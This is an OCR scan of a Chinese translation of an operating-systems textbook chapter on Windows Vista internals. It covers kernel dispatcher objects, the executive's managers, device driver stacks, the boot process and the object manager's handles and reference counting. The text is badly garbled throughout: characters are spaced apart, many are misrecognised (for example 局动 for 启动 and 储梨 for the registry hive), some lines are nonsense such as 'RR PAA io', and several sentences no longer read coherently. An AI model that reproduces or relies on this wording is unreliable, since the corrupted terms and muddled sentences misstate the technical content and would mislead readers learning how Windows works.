wait3。 而 通常 情况 下 ， 线 程 要 一 次 等 待 多 个 事件 。 在 UNIX 中 ， 通 
过 “select” 系 统 调用 ， 一 个 进程 可 以 等 待 任何 一 个 64 位 网 络 接口 可 以 获得 
的 数据 。 在 Windows 中 亦 有 一 个 类 似 的 APIWaitForMultipleObjects， 但 
是 它 允 许 一 个 线程 等 竺 任何 类 型 的 有 句柄 的 调度 对 象 。 超 过 64 个 句柄 可 
以 指定 WaitForMultipleObjects， 以 及 一 个 可 选择 的 超时 值 。 线 程 随时 准 
备 运行 任何 一 个 和 句柄 标记 相关 的 事件 或 发 生 超 时 。 














内 核 使 用 两 个 不 同 的 程序 使 得 线程 等 待 调度 对 象 运行 。 发 出 一 个 通 
知 对 象 信号 使 每 一 个 等 待 的 线程 可 以 运行 。 同 步 对 象 仅 使 第 一 个 等 待 的 
线程 可 以 运行 ， 用 于 调度 对 象 ， 实 施 锁 元 ， 如 互 斥 体 。 当 一 个 线程 等 待 
一 个 锁 再 次 开始 运行 ， 它 做 的 第 一 件 事 就 是 再 次 党 试 请 求 锁 。 如 果 一 次 
仅 有 一 个 线程 可 以 保留 锁 ， 其 他 所 有 可 运行 的 线程 可 能 立刻 被 阻塞 ， 从 
而 产生 许多 不 必要 的 现场 交换 。 使 用 同步 机 制 和 使 用 通知 机 制 的 分 派对 
Z (dispatcher object) 之 间 的 差别 是 dispatcher_header 结 构 中 的 一 个 标 
par 














另外 ， 在 Windows 代 码 中 互 斥 体 称 为 " 变 体 ”(Cmutant) 。 因 为 当 一 
个 线程 保留 一 个 出 口 时 ， 它 们 需要 执行 OS/2 语 义 中 的 非 目 动 解锁 ， 看 来 





这 是 Cutler 奇 特 的 考虑 。 
6. 执 行 体 


如 图 11-13 所 示 ， 在 NTOS 的 内 核 层 以 下 是 执行 体 。 执 行 体 是 用 C 语 
言 编写 的 ， 在 结构 上 最 为 独立 〈 内 存 管理 是 一 个 明显 的 例外 ) ， 并 且 经 
过 少量 的 修改 已 经 移植 到 新 的 处 理 器 上 (MIPS、x86、PowerPC、 
Alpha、IA64 和 x64) 。 执 行 体 包括 许多 不 同 的 组 件 ， 所 有 的 组 件 都 通过 
内 核 层 提供 的 抽象 控制 器 来 运行 








每 个 组 件 分 为 内 部 和 外 部 的 数据 结构 和 接口 。 每 个 组 件 的 内 部 方法 
古 隐藏 的 ， 只 有 组 件 目 己 可 以 调用 ， 而 外 部 方法 可 以 由 执行 体 的 所 有 其 
他 组 件 调 用 。 外 部 接口 的 一 个 子 集 由 一 个 ntoskrnl.exe 提 供 ， 而 且 设 备 驱 
动 可 以 链接 到 它们 就 好 像 执 行 体 是 一 个 库 。 微 软 称 许多 执行 体 组 件 
为 “管理 器 ?”， 因 为 每 一 个 组 件 管理 操作 系统 的 一 部 分 ， 例 如 IO、 内 
存 、 进 程 、 对 象 等 。 








对 于 大 多 数 操作 系统 而 言 ， 许 多 功能 在 Windows 上 执行 就 像 库 的 编 
码 。 除 非 在 内 核 方式 下 运行 ， 它 的 数据 结构 可 以 被 共 圣 和 保护 ， 以 避免 
用 户 态 下 的 编码 访问 ， 因 此 它 具 有 硬件 状态 的 访问 权限 ， 例 如 MMU 控 
制 寄存 占 。 但 是 妨 一 方面 ， 执 行 体 只 是 代表 它 的 调用 者 简单 执行 操作 系 
统 的 函数 ， 因 此 它 运行 在 它 的 调用 者 的 线程 中 。 


当 任何 执行 控制 操作 阻塞 等 竺 与 其 他 线程 同步 时 ， 用 户 态 线程 也 会 


阻 豆 。 这 在 为 一 个 特殊 的 用 户 态 线程 工作 时 是 有 意义 的 ， 但 是 在 做 一 些 
相关 的 内 务 处 理 任务 时 是 不 公平 的 。 当 执行 体 认为 一 些 内 务 处 理 线程 是 
必须 的 时 候 ， 为 了 避免 劫持 当前 的 线程 ， 一 些 内 核 态 线程 就 会 具体 于 特 
定 的 任务 而 产生 ， 例 如 确保 更 改 了 的 页 会 被 回 写 到 硬盘 上 。 








对 于 可 预见 的 低频 紊 任务 ， 会 有 一 个 线程 一 秒 运行 一 次 而 且 由 一 个 
长 的 项 目 单 来 处 理 。 对 于 不 可 预见 的 工作 ， 有 一 个 之 前 曾经 提 到 的 高 优 
先 级 的 辅助 线程 地 ， 通 过 将 队列 请 求 和 发 送 辅助 线程 等 待 的 同步 事件 信 
号 ， 可 以 用 来 运行 有 界 任务 。 


对 象 管理 器 管理 在 执行 体 使 用 的 大 部 分 内 核 态 对 象 ， 包 括 进程 、 线 
程 、 文 件 、 信 号 、IO 设 备 及 驱动 、 定 时 器 等 。 就 像 之 前 提 到 的 ， 内 核 
态 对 象 仅仅 是 内 核 分 配 和 使 用 的 数据 结构 。 在 Windows 中 ， 内 核 数 据 结 
构 有 许多 共同 特点 ， 即 它们 在 管理 标准 功能 中 特别 有 用 。 





这 些 功 能 由 对 象 管理 器 提供 ， 包 括 管 理 对 象 的 内 存 分 配 和 释放 ， 配 
额 计 算 ， 文 持 通 过 句柄 访问 对 象 ， 为 内 核 态 指针 引用 保留 引用 计数 ， 在 
NT 名 字 空 间 给 对 象 命名 ， 为 管理 每 一 个 对 象 的 生命 周期 提供 可 扩展 的 
机 制 。 需 要 这 些 功能 的 内 核 数据 结构 是 由 对 象 管理 器 来 管理 的 。 其 他 数 
据 结 构 ， 例 如 内 核 层 使 用 的 控制 对 象 ， 或 仅仅 是 内 核 态 对 象 的 扩展 对 
象 ， 不 由 对 象 管理 咒 管 理 。 








对 象 管 理 器 的 每 一 个 对 象 都 有 一 个 类 型 用 来 指定 这 种 类 型 的 对 象 的 








生命 周期 怎样 被 管理 。 这 些 不 是 面向 对 象 意义 中 的 类 型 ， 而 仅仅 是 当 对 
象 类 型 产生 时 的 一 个 指定 参数 集合 。 为 了 产生 一 个 新 的 类 型 ， 一 个 操作 
元 件 只 需要 调用 一 个 对 象 管理 器 API 即 可 。 对 象 在 windows 的 函数 中 很 
重要 ， 在 下 面 的 章节 中 将 会 讨论 有 关 对 象 管理 器 的 更 多 细节 。 


LO 管理 器 为 实现 1/O 设 备 驱 动 提供 了 一 个 框架 ， 同 时 还 为 设备 上 的 
配置 、 访 问 和 完成 操作 提供 一 些 特定 的 运行 服务 。 在 Windows 中 ， 设 备 
驱动 器 不 仅仅 管理 硬件 设备 ， 它 们 还 为 操作 系统 提供 可 扩展 性 。 在 其 他 
类 型 的 操作 系统 中 家纺 译 进 内 核 的 功能 是 被 Windows 内 核 动态 装载 和 链 
接 的 ， 包 括 网 络 协议 栈 和 文件 系统 。 














最 新 的 Windows 版 本 对 在 用 户 态 上 运行 设备 驱动 程序 有 更 多 的 支 
持 ， 这 对 新 的 设备 驱动 程序 是 首选 的 模式 。Windows Vista 有 超过 100 万 
不 同 的 设备 驱动 程序 ， 工 作 着 超过 了 100 万 不 同 的 设备 。 这 束 意 味 着 要 
获取 正确 的 代码 。 漏 洞 导 致 设备 在 用 户 态 的 进程 中 裔 省 而 不 能 使 用 ， 这 
比 造成 对 系统 进行 检测 错误 要 好 得 多 。 错 误 的 内 核 态 设备 驱动 是 导致 
Windows 可 怕 的 BSOD 蓝屏 死机 〉 的 主要 来 源 ， 它 是 Windows 侦 测 到 
致命 的 内 核 态 错误 并 关机 或 重新 局 动 系统 。 监 屏 死 机 可 以 类 比 于 UNIX 
RR PAA io 











在 本 质 上 ， 人 微软 现在 已 经 正式 承认 那些 在 microkernels 研 究 领 域 的 
如 MINIX 3 和 L4 的 研究 员 多 年 来 都 知道 的 结果 : 在 内 核 中 有 更 多 的 代 
码 ， 那 么 内 核 中 就 有 更 多 缺陷。 由 于 设备 驱动 程序 占 了 70% 的 内 核 代 








码 ， 更 多 的 驱动 程序 可 以 进入 用 户 态 进程 ， 其 中 一 个 bug 只 会 触 用 一 个 
单一 驱动 喜 的 失败 《而 不 是 降低 整个 系统 ) 。 从 内 核 到 用 户 态 进程 的 代 
码 移 动 趋势 将 在 未 来 几 年 加 速 友 展 。 


IO 管理 器 还 包括 即 插 即 用 和 电源 管理 设施 。 当 新 设备 在 系统 中 被 
检测 到 ， 即 插 即 用 残 开始 工作 。 该 即 插 即 用 设备 的 子 模块 首先 被 通知 。 
它 与 服务 一 起 工作 ， 即 用 户 态 即 插 即 用 管理 器 ， 找 到 适当 的 设备 驱动 程 
序 并 加 载 到 系统 中 。 找 到 合适 的 设备 驱动 程序 并 不 总 是 很 容易 ， 有 时 取 
决 于 先进 的 匹配 具体 软件 设备 特定 版 本 的 驱动 程序 。 有 时 一 个 单一 的 设 
备 文 持 一 个 由 不 同 公司 开发 的 多 个 驱动 程序 所 文 持 的 标准 接口 。 

















电源 管理 能 降低 能 源 消耗 ， 延 长 笔记 本 电脑 电池 寿命 ， 保 存 台 式 电 
脑 和 服务 器 能 量 。 正 确 使 用 电源 管理 是 具有 挑战 性 的 ， 因 为 在 把 设备 和 
buses 连 接 到 CPU 和 内 存 时 有 许多 微妙 的 依赖 性 。 电 力 消 耗 不 只 是 由 设备 
供电 时 的 影响 ， 而 且 还 由 CPU 的 时 钟 频率 影响 ， 这 也 是 电源 管理 在 控 
Hill. 





我 们 会 在 11.7 节 对 IO 进一步 研究 和 以 及 在 11.8 节 中 介绍 最 重要 的 NT 
文件 系统 NTFS。 





进程 管理 管理 着 进程 和 线程 的 创建 和 终止 ， 包 括 建立 规则 和 参数 指 
导 它 们 。 但 是 线程 运行 方面 由 核心 层 决定 ， 它 控制 着 线程 的 调度 和 同 
步 ， 以 及 它们 之 间 相 互 控 制 的 对 象 ， 如 APC。 进 程 包 含 线程 、 地 址 空间 











和 一 个 可 以 用 来 处 理 进 程 指定 内 核 态 对 象 的 句柄 表 。 进 程 还 包括 调度 如 
进行 地 址 空间 交换 和 管理 进程 中 的 具体 硬件 信息 (如 段 描 述 符 〉 所 需要 
的 信息 。 我 们 将 在 11.4 市 研究 进程 和 线程 的 管理 。 


执行 内 存 管理 器 实现 了 虚拟 内 存 以 构 的 需求 分 页 。 它 负责 管理 虚拟 
页 映射 到 物理 页 帧 ， 管 理 现 有 的 物理 帧 ， 和 使 用 备份 管理 磁盘 上 页 面 文 
件 ， 这 些 页 面 文件 是 用 来 备份 那些 不 再 需要 加 载 到 内 存 中 的 虚拟 页 的 私 
有 实例 。 该 内 存 管 理 需 还 为 大 型 服务 器 应 用 程序 提供 了 特殊 功能 ， 如 数 
据 库 和 编程 语言 运行 时 的 组 件 ， 如 垃圾 收集 器 。 我 们 将 在 11.5 节 中 研究 
内 存 管理 。 











内 存 管 理 器 优化 IO 的 性 能 ， 文 件 系统 内 核 虚 拟 地 址 空间 保持 一 个 
内 存 的 文件 系统 页 。 内 存 管理 器 使 用 虚拟 的 地 址 进行 缓存 ， 也 就 是 说 ， 
按照 它们 文件 所 在 位 置 来 组 织 缓存 页 。 这 不 同 于 物理 块 内 存 ， 例 如 在 
UNIX 中 ， 系 统 为 原始 磁盘 卷 保 持 一 个 物理 地 址 块 的 内 存 。 








内 存 的 管理 是 使 用 内 存 映 射 文件 来 实现 的 。 实 际 的 缓存 是 由 内 存 管 
理 器 完成 。 内 存 管理 器 需要 关心 的 只 是 文件 的 哪些 部 分 需要 内 存 ， 以 确 
保 缓存 的 数据 即时 地 刷新 到 磁盘 中 ， 并 管理 内 核 虚 拟 地 址 映射 缓存 文件 
页 。 如 果 一 个 页 所 需 的 IO 文件 在 缓存 中 没有 ， 该 页 在 使 用 内 存 管理 器 
时 将 会 发 生 错误 。 我 们 会 在 11.6 节 中 学 习 内 存 管理 器 。 














安全 引用 监视 器 (security reference monitor) 执行 Windows 详 细 的 


安全 机 制 ， 以 支持 计算 机 安全 要 求 的 国际 标准 的 通用 标准 (Common 

Critieria) ， 一 个 由 美国 国防 部 的 橘 育 书 的 安全 要 求 发 展 而 来 的 标准 。 

这 些 标准 规定 了 一 个 符合 要 求 的 系统 必须 满足 的 大 量规 则 ， 如 登录 验 

证 、 审 核 、 零 分 配 的 内 存 等 更 多 的 规则 。 一 个 规则 要 求 ， 所 有 进入 检 碍 
都 由 系统 中 的 一 个 模块 进行 检查 。 在 Windows 中 此 模块 就 是 内 核 中 的 安 
全 监视 费 。 我 们 将 在 11.9 市 中 更 详细 地 学 习 安 全 系统 。 








执行 体 中 包括 其 他 一 些 组 件 ， 我 们 将 简要 介绍 。 如 前 所 述 ， 配 置 管 
理 实现 注册 表 的 执行 组 件 。 注 册 表 中 包含 系统 配置 数据 的 文件 的 系统 文 
TERR ATS Chive) 。 了 节 关 键 的 储 虽 是 系统 局 动 时 加 载 到 内 存 的 系统 储 
时。 只 有 在 执行 体 成 功 地 初始 化 其 主要 组 件 ， 包 括 了 系统 磁盘 的 IO 张 
动 程 序 ， 之 后 才 是 文件 系统 中 储 梨 关联 的 内 存 中 的 储 梨 副本 。 因 此 ， 如 
果 试 图 启动 系统 时 发 生 不 测 ， 磁 盘 上 的 副本 是 不 太 可 能 被 损坏 的 。 








LPC 的 组 成 部 分 提供 了 运行 在 同一 系统 的 进程 之 间 的 高 效 内 部 通 
信 。 这 是 一 个 基于 标准 的 远程 过 程 调用 〈RPC) 功能 ， 实 现 客户 机 /服务 
铝 的 处 理 方式 的 数据 传输 。RPC 还 使 用 命名 管道 和 TCP/IP 作 为 传输 通 


道 。 





在 Windows Vista 〈 现 在 称 为 ALPC、 高 级 LPC) 中 LPC 大 大 加 强 了 
对 RPC 新 功能 的 文 持 ， 包 括 来 自 内 核 态 组 件 的 RPC， 如 驱动 。LPC 是 NT 
原始 设计 中 的 一 个 重要 的 组 成 部 分 ， 因 为 它 被 子 系统 层 使 用 ， 实 现 运行 
在 每 个 进程 和 子 系统 进程 上 库存 例 程 的 通信 ， 这 实现 了 一 个 特定 操作 系 





统 的 个 性 化 功能 ， 如 Win32 或 POSIX。 


Windows NT 4.0 中 的 许多 代码 与 Win32 进 入 内 核 的 图 形 界面 相关 ， 
因为 当时 的 硬件 无 法 提供 所 需 的 性 能 。 该 代码 以 前 位 于 csrss.exe 子 系统 
进程 ， 执 行 Win32 接 口 。 以 内 核 为 基础 的 图 形 用 户 界 面 的 代码 位 于 一 个 
专门 的 内 核 驱动 win32k.sys 中 。 这 一 变化 预计 将 提高 Win32 的 性 能 ， 因 
为 额外 的 用 户 态 /内 核 态 的 转换 和 转换 地 址 空间 的 成 本 经 由 LPC 执 行 通信 
是 被 清除 的 。 但 并 没 能 像 预期 的 那样 取得 成 功 ， 因 为 运行 在 内 核 中 的 代 





码 要 求 是 非常 严格 的 ， 运 行 在 内 核 态 上 的 额外 消耗 抵消 了 因 减 少 交 换 成 
本 获得 的 收益 。 
7. 设 备 驱 动 程序 


最 后 一 部 分 图 11-13 是 设备 驱动 程序 的 组 成 。 在 Windows 中 的 设备 驱 
动 程序 的 动态 链接 库 是 由 NTOS 装 载 。 虽 然 它们 主要 是 用 来 执行 特定 硬 
件 的 驱动 程序 ， 如 物理 设备 和 IO 总 线 ， 设 备 驱 动 程序 的 机 制 也 可 作为 
内 核 态 的 一 般 可 扩展 性 的 机 制 。 如 上 所 述 ， 大 部 分 的 win32 子 系统 是 作 
为 一 个 驱动 程序 被 加 载 。 





IO 管理 需 组 织 的 数据 按照 一 定 的 路 线 流 经 过 每 个 设备 实例 ， 如 图 
11-16。 这 个 路 线 称 为 设备 栈 ， 由 分 配 到 这 条 路 线 上 的 内 核 设备 对 象 的 
私有 实例 组 成 。 设 备 堆 栈 中 的 每 个 设备 对 象 与 特定 的 驱动 程 厅 对 象 相关 
联 ， 其 中 包含 日 第 使 用 的 VO 请 求 的 数据 包 流 经 该 设备 堆栈 的 表 。 在 汞 





些 情况 下 ， 扒 栈 中 的 设备 驱动 程序 表示 其 唯一 的 目的 是 在 茶 一 特定 的 设 
备 上 过 小 IO 操作 目标 、 总 线 或 网 络 驱 动 有 。 过 小 强 的 使 用 是 有 一 些 原 

因 的 。 有 时 预 处 理 或 后 处 理 VO 操 作 可 以 得 到 更 清晰 的 架构 ， 而 其 他 时 

候 只 是 以 实用 为 出 友 点 ， 因 为 没有 修改 驱动 的 来 源 和 权限 ， 过 滤器 是 用 
来 解决 这 个 问题 的 。 过 滤器 还 可 以 全 面 执行 新 的 功能 ， 如 把 磁盘 分 区 或 
多 个 磁盘 分 成 RAID 卷 。 


图 














C: 文件 系统 过 滤器 文件 系统 过 滤器 驱动 程序 D: 文件 系统 过 滤器 
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NTFS 驱 动 程序 


卷 管理 驱动 程序 









C: 磁盘 类 设备 磁盘 类 驱动 程序 


D: 磁盘 类 设备 


磁盘 微型 端口 驱动 D: 磁盘 分 区 


设备 栈 由 设备 对 每 一 个 设备 对 象 都 链接 设备 栈 由 设备 对 象 组 
象 组 成 ， 比 如 : C 着 带 有 入 口 点 的 驱动 对 象 ” 成， 比如 : D 


11-16 简单 描绘 两 个 NTFS 文 件 卷 的 设备 栈 。I/O 请 求 包 由 上 往 下 


过 栈 。 每 一 级 堆栈 中 的 相关 驱动 中 的 适当 程序 被 调用 。 该 设备 栈 由 分 
配给 每 个 堆栈 的 设备 对 象 组 成 


isi 





文件 系统 作为 驱动 程序 被 加 载 。 每 个 文件 系统 卷 的 实例 ， 有 一 个 设 
备 对 象 创 建 ， 并 作为 该 设备 堆栈 卷 的 一 部 分 。 这 是 设备 对 象 将 与 驱动 对 
象 的 文件 系统 适当 的 卷 格式 发 生 关 联 。 特 别 过 滤 驱 动 程序 ， 称 为 文件 系 
统 过滤 驱 动 程序 ， 可 以 在 插入 设备 对 象 之 前 ， 文 件 系 统 设备 对 象 将 功能 
应 用 于 被 发 送 到 每 个 天 的 VO 请 求 ， 如 数据 读 取 或 写 入 的 病毒 检 醋 。 











网 络 协议 也 作为 使 用 WO 模型 的 驱动 被 装载 起 来 ， 例 如 Windows 
Vista 整 合 的 IPv4/IPv6 TCP/IP 实 现 。 对 于 老 的 基于 MS-DOS 的 Windows 操 
作 系 统 ，TCP/IP 驱 动 实现 了 一 个 特殊 的 Windows 1/O 模 型 网 络 接 口上 的 
协议 。 还 有 其 他 一 些 驱 动 也 执行 这 样 的 安排 ， 其 中 的 Windows 小 型 端 
口 。 共 至 功能 是 在 一 个 类 驱动 程序 中 。 例 如 ，SCSI 或 IDE 人 磁盘 或 USB 设 
备 通用 功能 是 作为 一 类 驱动 提供 的 ， 这 一 类 驱动 为 这 些 设备 的 每 个 特定 
类 型 提供 微 端口 驱动 程序 连接 为 一 个 库 。 








我 们 在 本 章 不 讨论 任何 特定 的 设备 驱动 ， 但 是 在 11.7 节 中 将 更 为 详 
细 地 介绍 有 关 IO 管 理 器 如 何 与 设备 驱动 互动 。 


11.3.2 ”局 动 Windows Vista 


使 用 操作 系统 需要 运行 几 个 步骤 。 当 电脑 打开 时 ，CPU 初 始 化 硬 
件 。 然 后 开始 执行 内 存 中 的 一 个 程序 。 但 是 ， 唯 一 可 用 的 代码 是 由 计算 
机 制造 商 初始 化 的 某 些 非 易 失 性 的 CMOS 内 存 形式 (有 时 被 用 户 更 新 ， 
在 一 个 进程 中 称 为 内 存 ) 。 在 大 多 数 PC 机 中 ， 最 初 的 初始 化 程序 是 
BIOS (基本 输入 /输出 系统 ) ， 它 知道 如 何在 一 台 PC 机 上 找到 设备 的 标 
准 类 型 。BIOS 提 供 了 Windows Vista 在 磁盘 驱动 器 分 区 开始 时 首先 装载 
的 小 引导 程序 。 


引导 程序 知道 如 何在 根 目 录 的 文件 系统 卷 之 外 阅读 足够 的 信息 去 发 
现 独 立 的 Windows BootMgr 程 序 。BootMgr 确 定 系 统 是 否 已 经 处 于 休眠 
或 待机 模式 〈 特 别 省 电 模式 ， 系 统 不 需要 重启 就 可 以 重新 打开 ) 。 如 果 
是 ，BootMgr 加 载 和 执行 WinResume.exe。 和 否则 加 载 和 执行 WinLoad.exe 
执行 新 的 启动 。WinLoad 加 载 系统 启动 组 件 到 内 存 中 : 内 核 /执行 体 ( 通 
常 是 Ntoskrnlexe)、HAL(hal.dD)， 该 文件 包含 系统 储 梨 ，Win32k.sys 驶 
动 包含 Win32 子 系统 的 内 核 态 部 分 ， 以 及 任何 其 他 在 系统 储 梨 中 作为 启 
动 驱动 程序 列 出 的 驱动 程序 的 镜像 ， 这 就 意味 着 在 系统 启动 时 ， 它 们 是 
必需 的 。 

















一 旦 Windows 启 动 组 件 加 载 到 内 存 中 ， 控 制 就 转移 给 NTOS 中 的 低 


级 代码 ， 来 完成 初始 化 HAL、 内 核 和 执行 体 、 链 接 驱 动 像 、 访 问 /更 新 
系统 配置 中 的 数据 等 操作 。 所 有 内 核 态 的 组 件 初 始 化 后 ， 第 一 个 用 户 态 
进程 被 创建 ， 使 用 运行 着 的 smss.exe 程 序 (如 同 UNIX 系 统 中 

的 /etcinit) 。 


Windows 月 动 程序 在 遇 到 系统 局 动 失败 时 ， 有 专门 处 理 币 用 问题 的 
逻辑 。 有 时 安装 一 个 坏 的 设备 驱动 程序 ， 或 运行 一 个 像 注册 表 一 样 的 程 
序 〈( 能 导致 系统 储 业 损坏 )， 会 阻止 系统 正常 启动 。 系 统 提供 了 一 种 功 
来 文 持 忽略 最 近 的 变化 并 局 动 到 最 近 一 次 的 系统 正确 配置 。 其 他 局 动 
选项 包括 安全 启动 ， 它 关闭 了 许多 可 选 的 驱动 程序 。 还 有 故障 恢复 控制 


台 ， 局 动 cmd.exe 命 令 行 窗口 ， 它 提供 了 一 个 类 似 UNIX 的 单 用 户 态 。 





ZI 








为 一 个 常见 的 问题 ， 用 户 认 为 ,一些 Windows 系 统 偶尔 看 起 来 很 不 
可 思议 ， 经 党 有 系统 和 应 用 程序 的 (看 似 随机 〉 崩 演 。 从 微软 的 在 线 崩 
涡 分 析 程 序 得 到 的 数据 ， 提 供 了 许多 骨 演 是 由 于 物理 内 存 损 坏 导 致 的 证 
据 。 所 以 Windows Vista 月 动 进程 提供 了 一 个 运行 广义 上 的 内 存 诊 断 的 选 
项 。 也 许 未 来 的 PC 硬件 将 普遍 支持 ECC〈 或 者 部 分 ) 内 存 ， 但 是 今天 的 
大 多 数 合式 机 和 笔记 本 电脑 系统 很 容易 受到 攻击 ， 即 便 是 在 它们 所 包含 
的 数 十 亿 比 特 的 内 存 中 的 单 比特 错误 。 


11.3.3 对象 管 理 器 的 实现 


对 象 管 理 器 也许 是 Windows 可 执行 过 程 中 一 个 最 重要 的 组 件 ， 这 也 
古 为 什么 我 们 已 经 介绍 了 它 的 许多 概念 。 如 前 所 述 ， 它 提供 了 一 个 统一 
的 和 一 致 的 接口 ， 用 于 管理 系统 资源 和 数据 结构 ， 如 打开 文件 、 进 程 、 
线程 、 内 存 部 分 、 定 时 器 、 设 备 、 驱 动 程序 和 信号。 更 为 特殊 的 对 象 可 
以 表示 一 些 事 物 ， 像 内 核 的 事务 、 外 形 、 安 全 令 牌 和 由 对 象 管理 器 管理 
的 Win32 蝎 面 。 设 备 对 象 和 IO 系统 的 描述 联系 在 一 起 ， 包 括 提供 NT 名 
字 空 间 和 文件 系统 卷 之 间 的 链接 。 配 置 管理 器 使 用 一 个 Key 类 型 的 对 象 
与 注册 配置 相 链接 。 对 象 管 理 器 自身 有 一 些 对 象 ， 它 用 于 管理 NI 名 字 
空间 和 使 用 公共 功能 来 实现 对 象 。 在 这 些 目录 中 ， 有 象征 性 的 联系 和 对 
象 类 型 的 对 象 。 








由 对 象 管理 器 提供 的 统一 性 有 不 同 的 方面 。 所 有 这 些 对 象 使 用 相同 
的 机 制 ， 包 括 它 们 是 如 何 创 建 、 销 毁 以 及 定额 分 配 值 的 占有 。 它 们 都 可 
以 被 用 户 态 进程 通过 使 用 句柄 访问 。 在 内 核 的 对 象 上 有 一 个 统一 的 协议 
管理 指针 的 引用 。 对 象 可 以 从 NT 的 名 字 空 间 ( 由 对 象 管理 器 管理 ) 中 得 到 
名 字 。 调 度 对 象 〈 那 些 以 信号 事件 相关 的 共同 数据 结构 开始 的 对 象 ) 可 
以 使 用 共同 的 同步 和 通知 接口 ， 如 WaitForMultipleObjects。 有 一 个 共同 
的 安全 系统 ， 其 执行 了 以 名 称 来 访问 的 对 象 的 ACL， 并 检查 每 个 使 用 的 
句柄 。 甚 至 有 工具 帮助 内 核 态 开发 者 ， 在 使 用 对 象 的 过 程 中 追 踩 调试 问 








理解 对 象 的 关键 ， 是 要 意识 到 一 个 〈 执 行 ) 对 象 仅 仅 是 内 核 态 下 在 
虚拟 内 存 中 可 以 访问 的 一 个 数据 结构 。 这 些 数据 结构 ， 常 用 来 代表 更 抽 
象 的 概念 。 例 如 ， 执 行文 件 对 象 会 为 那些 已 打开 的 系统 文件 的 每 一 个 实 
例 而 创建 。 进 程 对 象 被 创建 来 代表 每 一 个 进程 。 





一 种 事实 上 的 结果 是 ， 对 象 只 是 内 核 数 据 结构 ， 当 系统 重新 局 动 时 
CBHI) 所 有 的 对 象 都 将 丢失 。 当 系统 启动 时 ， 没 有 对 象 存 在 ， 甚 
至 没有 对 象 类 型 描述 。 所 有 对 象 类 型 和 对 象 上 自身 ， 由 对 象 管理 器 提供 接 
口 的 执行 体 的 其 他 组 件 动 态 创建 。 当 对 象 被 创建 并 指定 一 个 名 字 ， 它 们 
可 以 在 以 后 通过 NT 名 字 空 间 被 引用 。 因 此 ， 建 并 对 象 的 系统 根 目 录 还 


建立 了 NT 名 字 空 间 。 








对 象 结构 ， 如 图 11-17 所 示 。 每 个 对 象 包含 一 个 对 所 有 类 型 的 所 有 
对 象 的 茶 些 共性 信息 头 。 在 这 个 头 的 领域 内 包括 在 名 字 空 间 内 的 对 象 的 
名 称 ， 对 象 目录 ， 并 指 加 安全 描述 符 代 表 的 ACL 对 象 。 
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图 11-17 ”对象 管 理 器 管理 的 执行 体 对 象 的 结构 


对 象 的 内 存 分 配 来 自由 执行 体 保持 的 两 个 堆 〈 或 池 ) 的 内 存 之 一 。 
在 有 《 像 内 存 分 配 ) 效用 函数 的 执行 体 中 ， 人 允许 内 核 态 组 件 不 仅 分 配 分 
页 内 核 内 存 ， 也 分 配 无 分 页 内 核 内 存 。 对 于 那些 需要 被 具有 CPU 2 级 以 
及 更 高 优先 级 的 对 象 访问 的 任何 数据 结构 和 内 核 态 是 对 象 ， 无 分 页 内 存 
都 是 需要 的 。 这 包括 ISR 和 DPC《〈 但 不 包括 APC) 和 线程 调度 本 映 。 该 
pagefault 处 理 也 需要 由 无 分 页 内 核 内 存 分 配 的 数据 结构 ， 以 避免 递归 。 





大 部 分 来 自 内 核 堆 管理 器 的 分 配 ， 是 通过 使 用 每 个 处 理 器 后 备 名 单 
来 获得 的 ， 这 个 后 备 名 单 中 包含 分 配 大 小 一 致 的 LIFO 列 表 。 这 些 LIFO 
优化 不 涉及 锁 的 运作 ， 可 提高 系统 的 性 能 和 可 扩展 性 。 


每 个 对 象 标 头 包含 一 个 配额 字段 ， 这 是 用 于 对 进程 访问 一 个 对 象 的 
配额 征收 。 配 额 是 用 来 保持 用 户 使 用 较 多 的 系统 资源 。 对 无 分 页 核心 内 
存 〈 这 需要 分 配 物理 内 存 和 内 核 虚 拟 地 址 ) 和 分 页 的 核心 内 存 〈 使 用 了 
内 核 虚 拟 地 址 ) 有 不 同 的 限制 。 当 内 存 类 型 的 素 积 费用 达到 了 配额 限 
制 ， 由 于 资源 不 足 而 导致 给 该 进程 的 分 配 失败 。 内 存 管 理 咒 也 正在 使 用 
配额 来 控制 工作 集 的 大 小 和 线程 管理 器 ， 以 限制 CPU 的 使 用 率 。 





物理 内 存 和 内 核 虚 拟 地 址 都 是 宝贵 的 资源 。 当 一 个 对 象 不 再 需要 ， 
应 该 取消 并 回收 它 的 内 存 和 地 址 。 但 是 ， 如 果 一 个 仍 在 被 使 用 的 对 象 收 
到 新 的 请 求 ， 则 内 存 可 以 被 分 配给 力 一 个 对 象 ， 然 而 数据 结构 有 可 能 被 
损坏 。 在 Windows 执 行 体 中 可 以 很 容易 发 生 这 样 的 问题 ， 因 为 它 是 高 度 
多 线程 的 ， 并 实施 了 许多 异步 操作 〈 例 如， 在 完成 特定 数据 结构 之 上 的 
操作 之 前 ， 就 返回 这 些 数据 结构 传递 给 函数 的 调用 者 ) 。 








为 了 避免 由 于 竞争 条 件 而 过 早 地 释放 对 象 ， 对 象 管理 器 实现 了 一 个 
引用 计数 机 制 ， 以 及 引用 指针 的 概念 。 需 要 一 个 参考 指针 来 访问 一 个 对 
象 ， 即 便 是 在 该 物体 有 可 能 正 要 被 删除 时 。 根 据 每 一 个 特定 对 象 类 型 有 
关 的 协议 里 面 ， 只 有 在 从 些 时 候 一 个 对 象 才 可 以 被 性 一 个 线程 删除 。 在 
其 他 时 间 使 用 的 锁 ， 数 据 结构 之 间 的 依赖 和 关系， 甚至 是 没有 其 他 线程 有 
一 个 对 象 的 指针 ， 这 些 都 能 够 充分 保护 一 个 对 象 ， 使 其 避免 被 过 早 删 





1. 句 柄 


用 户 态 提 到 内 核 态 对 象 不 能 使 用 指针 ， 因 为 它们 很 难 验证 。 相 反 认 
核 态 对 象 必须 使 用 一 些 其 他 方式 命名 ， 使 用 户 代码 可 以 引用 它们 。 
Windows 使 用 句柄 来 引用 内 核 态 对 象 。 句 柄 是 不 透明 值 Copaque 
value) ， 该 不 透明 值 是 被 对 象 管理 器 转换 到 具体 的 应 用 ， 以 表示 一 个 对 
象 的 内 核 态 数据 结构 。 图 11-18 表 示 了 用 来 把 句柄 转换 成 对 象 的 指针 的 
句柄 表 的 数据 结构 。 句 柄 表 增 加 额外 的 间接 层 来 扩展 。 每 个 进程 都 有 目 
己 的 表 ， 包 括 该 系统 的 进程 ， 其 中 包含 那些 只 含有 内 核 线程 与 用 户 态 进 
程 不 相关 的 进程 。 














句柄 描述 符 A: 句 柄 表 入 口 S12 





图 11-18 使 用 一 个 单独 页 达到 512 个 句柄 的 最 小 表 的 句柄 表 数 据 结构 








